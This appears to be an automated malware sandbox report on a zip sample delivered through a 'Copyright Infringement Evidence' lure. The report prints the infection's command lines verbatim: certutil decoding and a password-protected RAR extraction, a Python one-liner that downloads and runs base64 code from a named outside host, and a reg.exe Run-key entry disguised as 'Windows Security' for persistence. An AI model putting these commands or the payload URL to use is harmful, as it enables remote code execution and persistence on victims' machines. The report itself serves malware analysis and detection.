Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DzbIZ1HRMj.zip

Overview

General Information

Sample name:DzbIZ1HRMj.zip
Analysis ID:1578963
MD5:d5fbf88855ce9d2c3232a1ef0c44f11e
SHA1:0db79e4ed21f179695535500ac1c362846a5b8aa
SHA256:2263ecb78befde815bec4f8357ed91d5dc03d0fd587cc95ce5a62a387df26b54
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: Execution from Suspicious Folder
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Legitimate Application Dropped Script
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 6696 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cmd.exe (PID: 6372 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Copyright Infringement Evidence - Images and Videos.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • certutil.exe (PID: 6328 cmdline: certutil -decode DzbIZ1HRMj DzbIZ1HRMj.rar MD5: F17616EC0522FC5633151F7CAA278CAA)
    • Rar.exe (PID: 6312 cmdline: Rar x -pAnfoE5FeC6R5dPfRbxQgKMtZdV6v0OKC -inul -y DzbIZ1HRMj.rar C:\Users\Public\M20EKMMEH2 MD5: 01F28B85ABF1993B7B14B3D15346F2E8)
    • synaptics.exe (PID: 5952 cmdline: "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
    • certutil.exe (PID: 5860 cmdline: certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat" MD5: F17616EC0522FC5633151F7CAA278CAA)
    • reg.exe (PID: 5400 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6752 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • synaptics.exe (PID: 1228 cmdline: "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))", CommandLine: "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))", CommandLine|base64offset|contains: , Image: C:\Users\Public\M20EKMMEH2\synaptics.exe, NewProcessName: C:\Users\Public\M20EKMMEH2\synaptics.exe, OriginalFileName: C:\Users\Public\M20EKMMEH2\synaptics.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Copyright Infringement Evidence - Images and Videos.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6372, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))", ProcessId: 5952, ProcessName: synaptics.exe
Source: File createdAuthor: frack113, Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 6328, TargetFilename: C:\Users\user\Desktop\DzbIZ1HRMj.rar
Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 5860, TargetFilename: C:\Users\Public\Windows Security.bat
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 52.0.145.89, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\M20EKMMEH2\synaptics.exe, Initiated: true, ProcessId: 5952, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49706
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 6372, TargetFilename: C:\Users\Public\M20EKMMEH2
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security
Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Copyright Infringement Evidence - Images and Videos.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6372, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, ProcessId: 5400, ProcessName: reg.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Copyright Infringement Evidence - Images and Videos.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6372, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f, ProcessId: 5400, ProcessName: reg.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: synaptics.exe, 0000000E.00000002.2138030231.000000006C87D000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdbAA source: synaptics.exe, 0000000E.00000002.2199979502.0000000073D53000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: synaptics.exe, 0000000E.00000002.2194130301.0000000073A83000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: synaptics.exe, 0000000E.00000002.2105183351.000000006C68C000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\bin\win32\python310.pdb source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2169516249.000000006CCC2000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: .pdbhqrY source: Rar.exe, 0000000D.00000003.1525205588.00000267F8FFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Rar.exe, 0000000D.00000000.1402748407.00007FF75F7D3000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Rar.exe, 0000000D.00000000.1402748407.00007FF75F7D3000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:35 2023 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: synaptics.exe, 0000000E.00000002.2138030231.000000006C87D000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: w.pdbit source: Rar.exe, 0000000D.00000003.1525205588.00000267F8FFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: synaptics.exe, 0000000E.00000002.2199979502.0000000073D53000.00000002.00000001.01000000.0000000C.sdmp
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9A2D20 FindFirstFileW,FindNextFileW,FindClose,14_2_6C9A2D20
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7CD1C0 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,FindFirstFileW,FindNextFileW,WideCharToMultiByte,20_2_6C7CD1C0
Source: C:\Users\user\Desktop\Rar.exeFile opened: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Math\Primality.pyiJump to behavior
Source: C:\Users\user\Desktop\Rar.exeFile opened: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Math\_IntegerBase.pyiJump to behavior
Source: C:\Users\user\Desktop\Rar.exeFile opened: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Math\Numbers.pyiJump to behavior
Source: C:\Users\user\Desktop\Rar.exeFile opened: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Math\_IntegerBase.pyJump to behavior
Source: C:\Users\user\Desktop\Rar.exeFile opened: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Math\Primality.pyJump to behavior
Source: C:\Users\user\Desktop\Rar.exeFile opened: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Math\Numbers.pyJump to behavior
Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C71B900 WSASetLastError,recv,20_2_6C71B900
Source: global trafficDNS traffic detected: DNS query: www.aviationchartersolutions.com
Source: synaptics.exe, 0000000E.00000003.1872057233.00000000015E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2091936766.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1882323668.0000000001676000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884206824.0000000001A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
Source: synaptics.exe, 0000000E.00000003.1532800940.00000000004A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue19619
Source: synaptics.exe, 0000000E.00000003.1537720925.0000000000497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue5845#msg198636
Source: synaptics.exe, 0000000E.00000003.1583695126.0000000001698000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1583868672.0000000001589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue874900
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: synaptics.exe, 0000000E.00000003.1568979332.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/259174/
Source: synaptics.exe, 0000000E.00000003.2012530001.000000000162C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2005085919.000000000162C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2019422179.000000000162C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1824970526.0000000001628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest
Source: synaptics.exe, 0000000E.00000003.1979381178.0000000001798000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1979381178.000000000179B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974956581.0000000001796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: synaptics.exe, 0000000E.00000003.2006146636.0000000001699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2000623728.0000000000489000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.000000000169E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1963146228.000000000169E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: synaptics.exe, 0000000E.00000003.2001310188.000000000047A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: synaptics.exe, 0000000E.00000003.2000623728.0000000000489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlU
Source: synaptics.exe, 0000000E.00000003.1979381178.0000000001798000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1979381178.000000000179B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974956581.0000000001796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: synaptics.exe, 0000000E.00000003.1979381178.000000000179B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974956581.0000000001796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl8
Source: synaptics.exe, 0000000E.00000003.2003685939.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985831849.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: synaptics.exe, 0000000E.00000003.1986662945.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1975463854.00000000019EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: synaptics.exe, 0000000E.00000003.2003685939.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985831849.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: synaptics.exe, 0000000E.00000003.1975463854.00000000019EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: synaptics.exe, 0000000E.00000003.2003685939.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985831849.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: synaptics.exe, 0000000E.00000003.2000623728.0000000000489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: synaptics.exe, 0000000E.00000003.1837071396.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1797188977.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2089649295.0000000003790000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1771128213.00000000019E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: synaptics.exe, 0000000E.00000003.1607176248.0000000001655000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com/
Source: synaptics.exe, 0000000E.00000003.1607176248.0000000001655000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com:/
Source: synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1657418032.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1987150935.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
Source: synaptics.exe, 0000000E.00000003.1978234989.0000000001620000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1679320741.000000000161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
Source: synaptics.exe, 0000000E.00000003.2008854194.0000000001A54000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1964387506.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2017313231.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1749238715.0000000001B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1661251659.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2024048436.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884934095.0000000001B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1669337534.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
Source: synaptics.exe, 0000000E.00000003.1583695126.0000000001698000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1583868672.0000000001589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/
Source: synaptics.exe, 0000000E.00000003.1613948269.0000000001655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
Source: synaptics.exe, 0000000E.00000003.2006146636.0000000001699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.000000000169E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1963146228.000000000169E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
Source: synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
Source: synaptics.exe, 0000000E.00000003.2006146636.0000000001699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.000000000169E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1963146228.000000000169E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es~Q
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: synaptics.exe, 0000000E.00000003.1683425743.00000000015DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap04.html#tag_04_11
Source: synaptics.exe, 0000000E.00000002.2069577398.00000000019EA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1964387506.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1975463854.00000000019EC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2024048436.0000000001B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: synaptics.exe, 0000000E.00000003.2031635787.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1964387506.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2024048436.0000000001B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/E
